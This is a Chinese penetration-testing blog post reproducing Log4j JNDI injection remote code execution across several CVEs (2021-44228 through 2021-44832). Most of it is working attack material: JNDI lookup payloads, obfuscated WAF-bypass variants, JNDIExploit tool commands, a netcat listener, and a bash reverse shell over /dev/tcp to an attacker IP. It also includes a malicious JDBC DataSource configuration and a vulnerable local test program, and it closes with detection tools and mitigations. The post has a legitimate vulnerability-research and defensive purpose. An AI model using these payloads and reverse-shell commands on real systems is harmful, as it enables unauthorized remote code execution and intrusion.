Log4j-JNDI注入RCE

博主： Naraku
发布时间：2022 年 01 月 23 日
399次浏览
暂无评论
2737字数
分类：渗透测试漏洞复现

漏洞简介

漏洞利用

Log4j 2.14.1 - RCE

CVE-2021-44228

POC

${jndi:ldap://xxx.dnslog.cn/exp}

# Bypass
${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp}

RCE

首先Netcat监听端口

$ nc -lvnp <Port>

工具1（已被作者删除）： https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2

$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <IP>
# -l <LDAP_Port> , 默认1389
# -p <HTTP_Port> , 默认8080

# 触发: 通过cmd参数传递命令
${jndi:ldap://<IP>:<LDAP_Port>/TomcatBypass/TomcatEcho}

# 反弹Shell
/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<NC_Port> 0>&1'

Log4j-JNDI-1

Log4j-JNDI-2

工具2：https://github.com/welk1n/JNDI-Injection-Exploit
- 这个没反弹成功，不知道什么原因
- Payload需要编码：Runtime-exec-payloads

# bash -i >& /dev/tcp/<VPS_IP>/<Port> 0>&1  # Base64编码

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<编码字符串>" -A "<VPS_IP>"

# 触发
${jndi:rmi://<IP>:<Port>/xxxxxx

Log4j-JNDI-3

Log4j-JNDI-4

Log4j 2.15.0-RC1 - RCE

Bypass：加个空格

${jndi:ldap://127.0.0.1:1389/ badClassName}

Log4j 2.15.0 - DoS/RCE(限制过多)

CVE-2021-45046

参考文章：
- Apache Log4j2拒绝服务漏洞分析
- 浅谈Log4j2之2.15.0版本RCE
DoS POC

${jndi:ldap://127.0.0.1}

Log4j 2.16.0

CVE-2021-45105

Log4j 2.17.0 - RCE(需修改目标配置文件)

CVE-2021-44832，通过JDBCAPPENDER的DataSource元素RCE

前提条件：需要配置文件JDBC连接可控
以官方文档为例：

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
    <JDBC name="databaseAppender" tableName="dbo.application_log">
             <DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource" />
         <Column ...
    </JDBC>
 </Appenders>
...
</Configuration>

修改为：

<DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>

Trick

不出网回显

浅谈Log4j2信息泄露与不出网回显

Bypass WAF

官方文档：https://logging.apache.org/log4j/2.x/manual/lookups.html

${lower:test}
${upper:qwer}
${hostName}     # 主机名
${java:version} # Java版本
${java:vm}
${java:runtime}

Example：

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

X-Api-Version

一些情况下请求头X-Api-Version字段存在漏洞，利用方法一样。这个弹不到Shell，但是有请求记录

Log4j-JNDI-5

本地环境

工具：https://github.com/welk1n/JNDI-Injection-Exploit

# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<CMD>" -A <IP>

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calculator.app" -A 127.0.0.1

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:1389/xxx}");
    }
}

Log4j-JNDI-6

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j-rce</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>

</project>

本地自查

Log4j2漏洞检测工具 - 长亭：https://log4j2-detector.chaitin.cn/
EmYiQing/JNDIScan - 4ra1n：https://github.com/EmYiQing/JNDIScan

修复方案

临时性缓解措施（任选一种，但是注意，只有 >=2.10.0 版本才可以用，老版本不支持这个选项）
- 在 jvm 参数中添加 -Dlog4j2.formatMsgNoLookups=true
- 系统环境变量中将LOG4J_FORMAT_MSG_NO_LOOKUPS 设置为 true
- 创建 log4j2.component.properties 文件，文件中增加配置 log4j2.formatMsgNoLookups=true
彻底修复漏洞:
- 研发环境修复：升级到官方提供的 log4j-2.15.0-rc2 版本
- 生产环境修复：https://github.com/zhangyoufu/log4j2-without-jndi 由长亭工程师提供的删除了 JndiLookup.class 的对应版本直接替换重启即可。
- 如果不放心网上下载的版本，也可以自己手动解压删除，删除jar包里的这个漏洞相关的class，然后重启服务即可：

$ zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

找长亭技术支持工程师获取虚拟补丁或者使用牧云直接检测。

版权属于：Naraku
本文链接：https://www.naraku.cn/posts/112.html
本站所有原创文章均采用知识共享署名-非商业-禁止演绎4.0国际许可证。如需转载请务必注明出处并保留原文链接，谢谢~

如果觉得我的文章对你有帮助，请我吃颗糖吧~

发表评论取消回复

评论 *

私密评论

名称 *

邮箱 *

地址

Log4j-JNDI注入RCE

Naraku • 2022 年 01 月 23 日

漏洞简介

漏洞利用

Log4j 2.14.1 - RCE

CVE-2021-44228

POC

${jndi:ldap://xxx.dnslog.cn/exp}

# Bypass
${j${lower:n}di:l${lower:d}ap://xxx.dnslog.cn/exp}

RCE

首先Netcat监听端口

$ nc -lvnp <Port>

工具1（已被作者删除）： https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2

$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <IP>
# -l <LDAP_Port> , 默认1389
# -p <HTTP_Port> , 默认8080

# 触发: 通过cmd参数传递命令
${jndi:ldap://<IP>:<LDAP_Port>/TomcatBypass/TomcatEcho}

# 反弹Shell
/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<NC_Port> 0>&1'

Log4j-JNDI-1

Log4j-JNDI-2

工具2：https://github.com/welk1n/JNDI-Injection-Exploit
- 这个没反弹成功，不知道什么原因
- Payload需要编码：Runtime-exec-payloads

# bash -i >& /dev/tcp/<VPS_IP>/<Port> 0>&1  # Base64编码

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<编码字符串>" -A "<VPS_IP>"

# 触发
${jndi:rmi://<IP>:<Port>/xxxxxx

Log4j-JNDI-3

Log4j-JNDI-4

Log4j 2.15.0-RC1 - RCE

Bypass：加个空格

${jndi:ldap://127.0.0.1:1389/ badClassName}

Log4j 2.15.0 - DoS/RCE(限制过多)

CVE-2021-45046

参考文章：
- Apache Log4j2拒绝服务漏洞分析
- 浅谈Log4j2之2.15.0版本RCE
DoS POC

${jndi:ldap://127.0.0.1}

Log4j 2.16.0

CVE-2021-45105

Log4j 2.17.0 - RCE(需修改目标配置文件)

CVE-2021-44832，通过JDBCAPPENDER的DataSource元素RCE

前提条件：需要配置文件JDBC连接可控
以官方文档为例：

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="error">
    <Appenders>
    <JDBC name="databaseAppender" tableName="dbo.application_log">
             <DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource" />
         <Column ...
    </JDBC>
 </Appenders>
...
</Configuration>

修改为：

<DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>

Trick

不出网回显

浅谈Log4j2信息泄露与不出网回显

Bypass WAF

官方文档：https://logging.apache.org/log4j/2.x/manual/lookups.html

${lower:test}
${upper:qwer}
${hostName}     # 主机名
${java:version} # Java版本
${java:vm}
${java:runtime}

Example：

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

X-Api-Version

一些情况下请求头X-Api-Version字段存在漏洞，利用方法一样。这个弹不到Shell，但是有请求记录

Log4j-JNDI-5

本地环境

工具：https://github.com/welk1n/JNDI-Injection-Exploit

# java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "<CMD>" -A <IP>

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /System/Applications/Calculator.app" -A 127.0.0.1

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:1389/xxx}");
    }
}

Log4j-JNDI-6

pom.xml

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>log4j-rce</artifactId>
    <version>1.0-SNAPSHOT</version>

    <dependencies>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
    </dependencies>

</project>

本地自查

Log4j2漏洞检测工具 - 长亭：https://log4j2-detector.chaitin.cn/
EmYiQing/JNDIScan - 4ra1n：https://github.com/EmYiQing/JNDIScan

修复方案

临时性缓解措施（任选一种，但是注意，只有 >=2.10.0 版本才可以用，老版本不支持这个选项）
- 在 jvm 参数中添加 -Dlog4j2.formatMsgNoLookups=true
- 系统环境变量中将LOG4J_FORMAT_MSG_NO_LOOKUPS 设置为 true
- 创建 log4j2.component.properties 文件，文件中增加配置 log4j2.formatMsgNoLookups=true
彻底修复漏洞:
- 研发环境修复：升级到官方提供的 log4j-2.15.0-rc2 版本
- 生产环境修复：https://github.com/zhangyoufu/log4j2-without-jndi 由长亭工程师提供的删除了 JndiLookup.class 的对应版本直接替换重启即可。
- 如果不放心网上下载的版本，也可以自己手动解压删除，删除jar包里的这个漏洞相关的class，然后重启服务即可：

$ zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

找长亭技术支持工程师获取虚拟补丁或者使用牧云直接检测。

版权属于：Naraku
本文链接：https://www.naraku.cn/posts/112.html
本站所有原创文章均采用知识共享署名-非商业-禁止演绎4.0国际许可证。如需转载请务必注明出处并保留原文链接，谢谢~

漏洞简介

漏洞利用

Log4j 2.14.1 - RCE

POC

RCE

Log4j 2.15.0-RC1 - RCE

Log4j 2.15.0 - DoS/RCE(限制过多)

Log4j 2.16.0

Log4j 2.17.0 - RCE(需修改目标配置文件)

Trick

不出网回显

Bypass WAF

X-Api-Version

本地环境

本地自查

修复方案

发表评论 取消回复

Log4j-JNDI注入RCE

漏洞简介

漏洞利用

Log4j 2.14.1 - RCE

POC

RCE

Log4j 2.15.0-RC1 - RCE

Log4j 2.15.0 - DoS/RCE(限制过多)

Log4j 2.16.0

Log4j 2.17.0 - RCE(需修改目标配置文件)

Trick

不出网回显

Bypass WAF

X-Api-Version

本地环境

本地自查

修复方案

发表评论取消回复